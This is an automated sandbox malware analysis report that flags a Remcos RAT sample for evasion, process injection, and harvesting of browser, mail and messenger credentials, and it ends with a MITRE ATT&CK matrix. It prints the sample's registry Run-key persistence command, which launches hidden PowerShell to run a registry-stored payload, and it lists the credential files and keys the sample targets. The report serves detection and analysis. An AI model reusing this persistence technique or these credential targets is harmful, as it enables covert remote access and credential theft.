        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeAPI/Special instruction interceptor: Address: 4D96CCD
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6228Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3488Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeWindow / User API: threadDelayed 9587Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeAPI coverage: 9.9 %
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3096Thread sleep time: -8301034833169293s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 2300Thread sleep time: -714000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 2300Thread sleep time: -28761000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040595A
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_0040658F FindFirstFileW,FindClose,0_2_0040658F
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00418981 memset,GetSystemInfo,12_2_00418981
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\intercessionate\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeAPI call chain: ExitProcess graph end nodegraph_0-3874
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeAPI call chain: ExitProcess graph end nodegraph_0-3870
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeAPI call chain: ExitProcess graph end nodegraph_13-33887
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,12_2_004044A4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Maps a DLL or memory area into another process
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and writeJump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe base: 1730000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe base: 19FFF4Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\lkcwddclh"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\omhpewnevqbu"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\yguhfoygjytgatk"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dpvrcfd"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\fsbcdyonhlh"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\qmgvdqygubzojv"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"Jump to behavior
        Source: Vaccinerende.exe, 00000008.00000003.3467265912.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3467348122.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3478586940.00000000068FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Manager
        Source: Vaccinerende.exe, 00000008.00000003.3467265912.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3467348122.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3491517945.00000000068FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: Vaccinerende.exe, 00000008.00000003.3491517945.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3478586940.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3492428807.00000000068FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagersB(|
        Source: Vaccinerende.exe, 00000008.00000003.3499440809.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3498161571.00000000068FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cProgram Manager
        Source: Vaccinerende.exe, 00000008.00000003.3491517945.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3478586940.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3499440809.00000000068FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HProgram ManagerOP
        Source: Vaccinerende.exe, 00000008.00000003.3463202609.00000000068FA000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3467265912.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3467348122.00000000068FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager`B?|
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,12_2_0041881C
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,13_2_004082CD
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040333D
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Tries to steal Instant Messenger accounts or passwords
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
        Tries to steal Mail credentials (via file registry)
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: ESMTPPassword13_2_004033F0
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword13_2_00402DB3
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword13_2_00402DB3
        Yara detected WebBrowserPassView password recovery tool
        Source: Yara matchFile source: Process Memory Space: Vaccinerende.exe PID: 6044, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: Vaccinerende.exe PID: 2140, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Detected Remcos RAT
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-DSGECXJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Deobfuscate/Decode Files or Information        		1
        OS Credential Dumping        		1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts11
        Native API        		1
        Registry Run Keys / Startup Folder        		1
        Access Token Manipulation        		2
        Obfuscated Files or Information        		2
        Credentials in Registry        		1
        Account Discovery        		Remote Desktop Protocol1
        Data from Local System        		2
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        Command and Scripting Interpreter        		Logon Script (Windows)212
        Process Injection        		2
        Software Packing        		1
        Credentials In Files        		3
        File and Directory Discovery        		SMB/Windows Admin Shares1
        Email Collection        		1
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        PowerShell        		Login Hook1
        Registry Run Keys / Startup Folder        		1
        DLL Side-Loading        		NTDS119
        System Information Discovery        		Distributed Component Object Model2
        Clipboard Data        		1
        Remote Access Software        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Masquerading        		LSA Secrets21
        Security Software Discovery        		SSHKeylogging2
        Non-Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Modify Registry        		Cached Domain Credentials21
        Virtualization/Sandbox Evasion        		VNCGUI Input Capture12
        Application Layer Protocol        		Data Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
        Virtualization/Sandbox Evasion        		DCSync4
        Process Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation        		Proc Filesystem1
        Application Window Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
        Process Injection        		/etc/passwd and /etc/shadow1
        System Owner/User Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
